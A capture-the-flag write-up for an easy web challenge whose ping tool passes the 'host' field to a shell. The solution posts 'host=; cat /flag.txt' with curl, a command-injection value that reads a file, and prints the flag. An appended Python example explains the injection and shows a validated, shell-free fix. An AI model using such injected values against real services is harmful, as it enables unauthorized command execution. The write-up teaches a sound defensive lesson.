Difficulty: easy

Category: web

Author: xnull

Description:

### Network Diagnostic Tool

This web tool lets you ping any server to check if it's reachable. The tool runs the ping command on the server and shows you the output.

The flag is stored in `/flag.txt` on the server.

Solution

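The ping functionality is vulnerable to simple command injection through the `host` parameter: a `;` ends the `ping` command and the shell runs whatever follows it, so we can read the flag directly: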

```sh
curl -s https://<uuid>.ctf.endolum.io:1337/ping -d "host=; cat /flag.txt" | grep ENDLM
```

Flag: ENDLM{07fa2e5399a80b2d9eb671a6b6ec649aa7e8e04789bc5b14}
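
Why the payload works and how the handler could be fixed, as an added example that is not part of the original writeup or the challenge's code. It assumes the server builds `ping -c 1 <host>` as a shell string (the challenge source is not shown); all function names are hypothetical.

```python
import ipaddress
import re
import shlex
import subprocess


def vulnerable_command(host: str) -> str:
    # Assumed shape of the bug: the form value is pasted into a shell string.
    return "ping -c 1 " + host


def shell_tokens(command: str) -> list:
    # Tokenize roughly as a POSIX shell would; ';', '|' and '&' become
    # separate tokens, which shows where a second command starts.
    return list(shlex.shlex(command, posix=True, punctuation_chars=True))


# One DNS label: letters, digits, hyphens; no leading or trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def validate_host(host: str) -> str:
    """Return host if it is an IP literal or a DNS hostname, else raise ValueError."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    labels = host.split(".")
    if len(host) > 253 or not all(_LABEL.fullmatch(label) for label in labels):
        raise ValueError("invalid host")
    return host


def safe_ping_argv(host: str) -> list:
    # The validated value is a single argv element and cannot start with '-',
    # so it can be neither a shell command nor a ping option.
    return ["ping", "-c", "1", validate_host(host)]


def safe_ping(host: str) -> str:
    # An argv list with the default shell=False: no shell ever parses the input.
    result = subprocess.run(safe_ping_argv(host), capture_output=True,
                            text=True, timeout=5)
    return result.stdout
```

`shell_tokens(vulnerable_command("; cat /flag.txt"))` shows the `;` token that splits the line into two commands, while `safe_ping_argv` rejects the same value before anything is executed.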